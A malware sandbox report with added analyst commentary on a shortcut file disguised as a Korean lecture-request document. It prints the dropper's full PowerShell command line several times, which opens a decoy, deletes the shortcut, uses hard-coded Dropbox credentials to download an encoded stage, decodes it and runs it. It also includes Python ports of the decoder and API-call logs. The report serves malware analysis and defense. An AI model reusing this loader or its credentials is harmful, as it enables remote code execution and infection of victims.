Summary | ZeroBOX

멀티캠퍼스 강연의뢰서_ 김병로 교수님 .docx.lnk (file name, Korean: "Multicampus lecture request form_ Professor Kim Byeong-ro .docx.lnk"; the original name is kept verbatim in the paths and command lines below, since the sample locates itself by it)

Tags: Generic Malware, Antivirus, GIF Format, Lnk Format, AntiVM, AntiDebug, PowerShell
Category FILE
Machine s1_win7_x6402
Started July 15, 2024, 4:54 p.m.
Completed July 15, 2024, 4:59 p.m.
Size 1.0MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized (the three "1600" timestamps are zero FILETIME values rendered in local time, i.e. the shortcut header's creation, access and write times were blanked; length=0 is the header's declared target file size, not the 1.0MB of the shortcut itself)
MD5 16074a3f76b7860a180e0ec54dd19ed6
SHA256 e936445935c4a636614f7113e4121695a5f3e4a6c137b7cdcceb6f629aa957c4
CRC32 25B0703B
ssdeep 768:YGNrKmRN73ExbcrYcWYF55GYAtGMu6YD5:YGNrKmRN73ExbcrSYF55TcGD6YD5
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "cgugMdqbYP" "C:\Users\test22\AppData\Local\Temp\멀티캠퍼스 강연의뢰서_ 김병로 교수님 .docx.lnk"

    PID 3048
    • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = 
\"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

      PID 1784
      • powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = 
@{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

        PID 2356
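
Reading the command line of PID 1784/2356 (the shortcut's own target; the outer cmd.exe /c start /wait is how the sandbox opens the shortcut): the script lists *.lnk in the current directory and keeps the one whose size is exactly 0x00103CFB (1,064,187 bytes, i.e. itself), reads it whole, writes bytes [1057132, 1062657) (5,525 bytes) to a file named like the shortcut minus its .lnk suffix, so Start-Process opens that file with the .docx handler as a decoy; the 1,530 trailing bytes from offset 1062657 are copied into $temp but never used ($encData_b64 and $tmp are dead code). It then deletes the shortcut, exchanges a hard-coded Dropbox app client ID, client secret and OAuth refresh token for an access token at https://api.dropboxapi.com/oauth2/token, downloads /0528/ps.bin from content.dropboxapi.com, strips a length-keyed bit-level XOR keystream from it (Decode-Binary, which is its own inverse) and runs the result with iex. The credentials and the remote path are the actionable indicators for blocking and for abuse reporting to Dropbox. The Python below is an added example, not code from this page or from the sample's author: it ports the carving offsets and the Decode-Binary keystream exactly as written, so a recovered ps.bin can be decoded offline without executing anything. The shortcut buffer and the "next stage" bytes are constructed stand-ins, since neither payload is on the page.

```python
"""Added example (not the sample's or ZeroBOX's code): Python port of the
carving offsets and of Decode-Binary from the PowerShell command line above.
All inputs are constructed here; the real LNK and ps.bin are not on the page."""

# Constants copied from the PowerShell command line.
LNK_SIZE = 0x00103CFB                    # 1,064,187 bytes: the script selects the .lnk of exactly this size
EXE_START, EXE_END = 1057132, 1062657    # $len1, $len2: 5,525 bytes written to "<shortcut name minus .lnk>"
TAIL_START = 1062657                     # $len3: the 1,530 trailing bytes are copied into $temp and never used
POLY = (0, 3, 29, 37, 73)                # $poly
POLY_N = 4                               # $poly_n: only POLY[1..3] feed the state update
POLY_ORD = 73                            # $poly_ord: state indices are taken modulo 73


def carve(lnk: bytes) -> tuple[bytes, bytes]:
    """Slice the buffer exactly as the script slices $file: (decoy payload, unused tail)."""
    if len(lnk) != LNK_SIZE:
        raise ValueError(f"expected a {LNK_SIZE}-byte shortcut, got {len(lnk)} bytes")
    return lnk[EXE_START:EXE_END], lnk[TAIL_START:]


def keystream(length: int):
    """Yield the per-byte XOR mask of Decode-Binary.

    The 74-entry state holds only 0/1 values, is seeded from nothing but the
    payload length, and is advanced by three XOR taps (POLY[1..3]) per byte;
    bit j of the mask is state[j] XOR (state[i*(j+1)] AND state[(i+j)*(j+1)]),
    all indices modulo POLY_ORD, just as in the PowerShell.
    """
    state = [1] * (POLY_ORD + 1)
    for i in range(POLY_ORD + 1):
        if i < length:
            state[i] = (length % (i + 1)) & 1
    for i in range(length):
        for j in range(1, POLY_N):
            state[i % POLY_ORD] ^= state[(i + POLY[j]) % POLY_ORD]
        mask = 0
        for j in range(8):
            mask ^= (state[j] ^ (state[(i * (j + 1)) % POLY_ORD]
                                 & state[((i + j) * (j + 1)) % POLY_ORD])) << j
        yield mask


def decode_binary(data: bytes) -> bytes:
    """XOR with the keystream; because XOR is an involution this also encodes."""
    return bytes(b ^ k for b, k in zip(data, keystream(len(data))))


def build_sample_lnk() -> bytes:
    """Constructed stand-in for the real shortcut: correct size, marker bytes at the carve offsets."""
    buf = bytearray(LNK_SIZE)
    buf[0:4] = b"L\x00\x00\x00"                       # ShellLink HeaderSize field, as in any .lnk
    buf[EXE_START:EXE_END] = b"D" * (EXE_END - EXE_START)
    buf[TAIL_START:] = b"T" * (LNK_SIZE - TAIL_START)
    return bytes(buf)


if __name__ == "__main__":
    decoy, tail = carve(build_sample_lnk())
    print(f"decoy bytes: {len(decoy)}, unused tail bytes: {len(tail)}")
    # Constructed "next stage"; a recovered ps.bin goes through decode_binary() the same way.
    stage = b"Write-Host 'constructed next stage'"
    assert decode_binary(decode_binary(stage)) == stage
    print("keystream for a 2-byte payload:", bytes(keystream(2)).hex())
```

Because the keystream depends only on the payload length, an analyst who obtains ps.bin needs no key material beyond the file itself; the same function re-encodes a test script, which is useful for building a detonation harness that serves a known next stage.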

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

No DNS lookup for, or connection to, api.dropboxapi.com or content.dropboxapi.com was recorded, consistent with the PowerShell stage never executing (see the parser error under WriteConsoleW); the Dropbox endpoints, the app credentials and the remote path /0528/ps.bin in the command line remain valid indicators regardless.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW ×5 and GetComputerNameA ×1 (logged order: W, W, W, W, A, W), each with computer_name: TEST22-PC; Status 1, Return 1, Repeated 0.
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW, 46 calls (console_handle 0x00000023 to 0x0000023f, Status 1, Return 1, Repeated 0). The 80-character buffers concatenate into a single PowerShell parser error whose echoed script body is the command line already shown in the process tree, so only the message, the failing token (marked <<<< by the parser) and the trailer are reproduced here:

buffer: You must provide a value expression on the right-hand side of the '-' operator.
buffer: At line:1 char:1724
buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;fo[script body as in the process tree]$ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) - <<<< shl $j));}} return $len } $clientID = "x2f7205ajf3knq9";[remainder as in the process tree]$receiveStream.Close();$response.Close();
buffer: + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
buffer: + FullyQualifiedErrorId : ExpectedValueExpression

The failing token is -shl inside Decode-Binary. The -shl and -shr operators exist only from PowerShell 3.0; the analysis machine (s1_win7_x6402) is Windows 7, which ships with Windows PowerShell 2.0, so the entire -c script was rejected at parse time and no statement ran. That explains the rest of the report: no decoy file is written or opened, the shortcut is not deleted, no Dropbox endpoint is contacted, and no decoded stage reaches memory. The outcome is an environment mismatch, not evidence that the sample is benign or that it detected the sandbox; re-detonate on a host with PowerShell 3.0 or later to observe the actual chain.
Time & API Arguments Status Return Repeated

CryptExportKey, 44 calls, all with buffer: <INVALID POINTER>, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 (PUBLICKEYBLOB); Status 1, Return 1, Repeated 0. crypto_handle values in logged order, consecutive repeats collapsed:
  0x00683838 (1), 0x00683ff8 (3), 0x00683ef8 (6), 0x006838f8 (3), 0x00683ab8 (3), 0x00683af8 (1), 0x00683ab8 (7), 0x006841f8 (14), 0x006834b8 (6)

Reading: crypto_export_handle 0 together with an unreadable pbData is what the size-query form of CryptExportKey looks like (pbData NULL, the caller asking only for the blob length). These public-key exports are most plausibly a by-product of the .NET runtime hosting PowerShell; the sample's own "cryptography" is the hand-rolled XOR keystream in Decode-Binary, which never touches CryptoAPI.
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

Every call below is made by powershell.exe (process_identifier 2356) against its own process (process_handle 0xffffffff) with protection 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass 0, stack_pivoted 0, Status 1, Return 0, Repeated 0; only the varying fields are listed, in logged order.

API                       base_address   size      allocation_type      heap_dep_bypass
NtAllocateVirtualMemory   0x02890000     1572864   8192 (MEM_RESERVE)   0
NtAllocateVirtualMemory   0x029d0000     4096      4096 (MEM_COMMIT)    1
NtProtectVirtualMemory    0x73921000     4096      (length)             0
NtAllocateVirtualMemory   0x01fea000     4096      4096 (MEM_COMMIT)    1
NtProtectVirtualMemory    0x73922000     8192      (length)             0
NtAllocateVirtualMemory   0x01fe2000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x01ff2000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x029d1000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x029d2000     8192      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x0205a000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x01ff3000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x01ff4000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x0206b000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02067000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x01feb000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02052000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02065000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x01ff5000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x0205c000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02a10000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x01ff6000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x0206c000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02053000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02054000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02055000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02056000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02057000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02058000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x02059000     4096      4096 (MEM_COMMIT)    1
NtAllocateVirtualMemory   0x05000000 .. 0x05014000 (21 consecutive pages, one call each)   4096   4096 (MEM_COMMIT)   1

Reading: process_handle 0xffffffff is the current-process pseudo-handle, so nothing here writes into another process. A large RWX reserve followed by page-by-page RWX commits, plus two NtProtectVirtualMemory calls on already-mapped pages, is the pattern the .NET CLR produces while JIT-compiling managed code in a PowerShell host; on its own it is not evidence of shellcode staging, and in this run the script failed at parse time, so no decoded stage was ever placed in memory.
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Local\Temp\멀티캠퍼스 강연의뢰서_ 김병로 교수님 .docx.lnk
cmdline "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = 
\"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
cmdline powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = 
@{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
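The PowerShell one-liner above does three things an analyst usually wants to reproduce offline: it locates a .lnk of exactly 0x00103CFB bytes, carves the byte range 1057132..1062657 out of it into a file named after the shortcut with ".lnk" stripped (and opens it with Start-Process), and defines Decode-Binary, a length-seeded XOR that it later applies to ps.bin fetched from Dropbox before passing the result to iex. The following Python is an added example written for this page, not code from the report or from the sample; it re-implements Decode-Binary and the carving step using only the constants visible in the command line. The sample inputs in the demo (the fake .lnk buffer and the short stage-two string) are constructed for illustration; the real ps.bin is not on this page.

```python
# Added example (not from the ZeroBOX report or the sample): offline
# re-implementation of the dropper's carving step and of Decode-Binary.
# All constants are taken from the PowerShell command line in the report.

LNK_SIZE = 0x00103CFB                  # the script only acts on a .lnk of exactly this size
EXE_START, EXE_END = 1057132, 1062657  # $len1 / $len2: slice written to '<name minus .lnk>'
POLY = (0, 3, 29, 37, 73)              # $poly
POLY_N = 4                             # $poly_n: only POLY[1..3] feed the state update
POLY_ORD = 73                          # $poly_ord: state is indexed modulo 73


def carve_embedded_exe(lnk: bytes) -> bytes:
    """Return the bytes the script writes to the shortcut's name with '.lnk' stripped.

    Mirrors the size check ($path.length -eq 0x00103CFB) and the copy loop
    from $len1 to $len2. The tail from $len3 onward is copied by the script
    but never used, so it is not returned here.
    """
    if len(lnk) != LNK_SIZE:
        raise ValueError(f"expected a {LNK_SIZE}-byte .lnk, got {len(lnk)} bytes")
    return lnk[EXE_START:EXE_END]


def keystream(n: int) -> bytes:
    """Reproduce the key bytes Decode-Binary XORs over an n-byte buffer.

    The state is seeded only from n (the buffer length), so every buffer of
    the same length gets the same key. No secret is involved.
    """
    state = [1] * (POLY_ORD + 1)
    for i in range(POLY_ORD + 1):
        if i < n:
            state[i] = (n % (i + 1)) & 1   # [byte](($len % ($i + 1)) -band 1)
    out = bytearray(n)
    for i in range(n):
        s = i % POLY_ORD
        # Feedback step: state[i%73] ^= state[(i+3)%73] ^ state[(i+29)%73] ^ state[(i+37)%73]
        for j in range(1, POLY_N):
            state[s] ^= state[(i + POLY[j]) % POLY_ORD]
        # Bit assembly: one key bit per j, exactly as in the inner for ($j ... 8) loop
        k = 0
        for j in range(8):
            bit = state[j] ^ (state[(i * (j + 1)) % POLY_ORD]
                              & state[((i + j) * (j + 1)) % POLY_ORD])
            k |= bit << j
        out[i] = k
    return bytes(out)


def decode_binary(data: bytes) -> bytes:
    """XOR data with keystream(len(data)). XOR is an involution, so this also encodes."""
    return bytes(b ^ k for b, k in zip(data, keystream(len(data))))


if __name__ == "__main__":
    # Constructed stand-in for ps.bin: encode a short script, then decode it back.
    stage_two = b"Write-Host 'constructed stage-two placeholder'"
    blob = decode_binary(stage_two)            # what an attacker-side encoder would produce
    assert decode_binary(blob) == stage_two
    print("keystream for the first 8 bytes:", keystream(len(stage_two))[:8].hex())

    # Constructed stand-in for the .lnk: right size, with a marker at the carve offset.
    fake_lnk = bytearray(LNK_SIZE)
    fake_lnk[EXE_START:EXE_START + 2] = b"MZ"
    carved = carve_embedded_exe(bytes(fake_lnk))
    print("carved", len(carved), "bytes, starts with", carved[:2])
```

Two things this makes visible that the one-liner hides. First, Decode-Binary is keyed by nothing but the length of the downloaded buffer, so anyone holding a copy of ps.bin can recover the stage-two script with this function alone, without the Dropbox refresh token or client secret. Second, in the original the PowerShell `$binary` parameter is a byte[] passed by reference, which is why the script ignores the function's return value and reads `$enc_bytes` afterwards; the Python version returns a new buffer instead.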
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2224
thread_handle: 0x00000338
process_identifier: 1784
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
